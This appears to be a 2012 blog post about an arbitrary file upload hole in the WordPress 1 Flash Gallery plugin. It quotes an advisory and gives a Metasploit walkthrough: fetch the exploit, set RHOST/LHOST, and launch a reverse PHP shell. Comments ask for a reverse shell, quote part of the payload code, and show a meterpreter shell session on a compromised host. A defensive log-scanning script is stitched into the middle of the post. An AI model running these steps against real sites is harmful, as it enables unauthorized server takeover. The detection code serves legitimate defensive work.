Friday, 1 June 2012

WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.

Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy to /pentest/exploits/framework3/modules/exploits/multi/http

Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained in my video.

msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit

And that's it. Thank you guys for watching.
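From the defender's side, the advisory above gives enough to write a detection for this bug: a request to the plugin's upload.php with action=uploadify and a fileext outside the image types a gallery needs, followed by a request for a freshly created .php file (comment 6 below shows the uploaded shell appears as a 14-digit timestamp-named file such as 20111011082340.php). The following scanner over Apache combined-format access logs is an added example, not part of the original post or the Metasploit module; the log lines, the uploads path and the allowed-extension set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post). The
# wp-content/uploads/fgallery path is an assumption; the 14-digit basename
# mirrors the file listing shown in comment 6.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Sep/2011:10:00:01 +0000] "POST /wordpress/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Sep/2011:10:00:02 +0000] "GET /wordpress/wp-content/uploads/fgallery/20111011082340.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Sep/2011:10:05:00 +0000] "POST /wordpress/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Sep/2011:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_SCRIPT = "/wp-content/plugins/1-flash-gallery/upload.php"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}   # what a gallery legitimately needs
TIMESTAMP_PHP = re.compile(r"/\d{14}\.php$")   # heuristic for the dropped file


def classify(line):
    """Return a finding tuple for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query)
    # Upload attempt through the vulnerable handler with a non-image extension.
    if parts.path.endswith(UPLOAD_SCRIPT) and qs.get("action") == ["uploadify"]:
        ext = qs.get("fileext", [""])[0].lower()
        if ext not in ALLOWED_EXT:
            return ("upload_attempt", m.group("ip"), ext)
    # Follow-up access to a timestamp-named PHP file (the uploaded shell).
    if TIMESTAMP_PHP.search(parts.path):
        return ("webshell_access", m.group("ip"), parts.path)
    return None


def scan(log_text):
    """Run classify() over every line and keep the findings in order."""
    return [r for r in map(classify, log_text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

If the plugin receives action and fileext in the POST body rather than the query string, the access log will not contain them; in that case the same logic belongs in a request-body-aware layer such as a WAF or application logging, and the timestamp-named .php access remains the observable signal.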

8 comments:

  1. hi bro, is the airwolf reverse shell public?
    send me the link plz
  2. airwolf_reverse shell link plz bro
  3. I'm trying to start the exploit but it outputs the following error

    msf exploit(flash_galery_wordpress) > exploit

    [*] Started reverse handler on 192.168.1.3:4444
    [*] Successfully uploaded shell.
    [*] Trying to access shell at ...
    [-] Exploit exception: can't convert nil into String
    [*] Exploit completed, but no session was created.
    msf exploit(flash_galery_wordpress) >

    Please tell me what's wrong?
  4. What is the payload you are trying to use?

  5. hi Angelo, one question.

    You modified the payload reverse_php.rb in /../payloads/singles/php, but you copy/pasted the exploit into this file at this line

    shell=<<-END_OF_PHP_CODE

    END_OF_PHP_CODE


    but the modified code is different from what I see...

    I show you my code

    def php_reverse_shell

      if (!datastore['LHOST'] or datastore['LHOST'].empty?)
        # datastore is empty on msfconsole startup
        ipaddr = '127.0.0.1'
        port = 4444
      else
        ipaddr = datastore['LHOST']
        port = datastore['LPORT']
      end
      exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)

      uri = "tcp://#{ipaddr}"
      socket_family = "AF_INET"

      if Rex::Socket.is_ipv6?(ipaddr)
        uri = "tcp://[#{ipaddr}]"
        socket_family = "AF_INET6"
      end

      shell=<<-END_OF_PHP_CODE

    -----------------o----------------

    your code does not show this at the beginning
    show us your code
    thx
  6. Metasploit upgraded those payloads, but they still don't work.
    I just tested now and you can use this payload: php/meterpreter/bind_tcp
    Once you get your meterpreter session, just type "shell" then hit enter and you will get your shell.

    EX:
    meterpreter > shell
    Process 15882 created.
    Channel 0 created.

    id
    uid=48(apache) gid=48(apache) groups=48(apache)
    ls
    20111011082340.php

  7. the flash gallery is nice
    as you are dealing in hacking you must see this too...
    http://born2hack.hpage.com/top-10-ethical-hackers-of-india_18213017.html